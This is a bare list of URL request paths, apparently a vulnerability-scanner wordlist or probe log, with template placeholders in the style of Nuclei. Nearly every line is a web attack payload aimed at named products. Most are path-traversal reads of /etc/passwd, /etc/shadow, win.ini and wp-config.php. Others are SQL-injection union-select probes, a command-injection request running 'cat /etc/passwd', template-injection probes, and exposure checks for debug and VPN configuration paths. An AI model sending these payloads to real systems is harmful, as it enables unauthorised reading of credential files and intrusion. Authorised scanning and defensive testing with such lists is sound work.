/?id=nuclei%25{128*128}
/api/filemanager?path=%2F..%2f..%2fContent
/debug/pprof/
/debug/pprof/goroutine?debug=1
/LetsEncrypt/Index?fileName=/etc/passwd
/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd
/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php
/WealthT24/GetImage?docDownloadPath=/etc/passwd
/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini
/base_import/static/c:/windows/win.ini
/web/static/c:/windows/win.ini
/base/static/c:/windows/win.ini
/api/snapshots
/sslmgr
/wp-content/plugins/insert-php/readme.txt
/catalog.php?filename=../../../../../../../../../etc/passwd
/action/usermanager.htm
/cgi-bin/config.exp
/admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23
/admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin
/api-third-party/download/extdisks../etc/passwd
/page/sl_logdl?dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd
/../../../../../../etc/passwd
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini
/node/1?_format=hal_json
/../../../../../etc/passwd
/s/{{randstr}}/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml
/s/{{randstr}}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html
/search/
/.%00./.%00./etc/passwd
/index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd
/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/
/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd
/WealthT24/GetImage?docDownloadPath=/etc/passwd&
/pages/systemcall.php?command=cat%20/etc/passwd
/plugins/search/..\..\..\conf\openfire.xml
/page/sl_logdl?dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/shadow
/vpn/../vpns/cfg/smb.conf
/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini
/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd
/?c=../../../../../../etc/passwd%00
/badging/badge_print_v0.php?tpl=../../../../../etc/passwd
/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd
/.%00./.%00./etc/shadow
/mnt/overlay/dam/gui/content/assets/metadataeditor.external.html?item=$%7b{{num1}}*{{num2}}%7d
/CDGServer3/ClientAjax
/config.dat
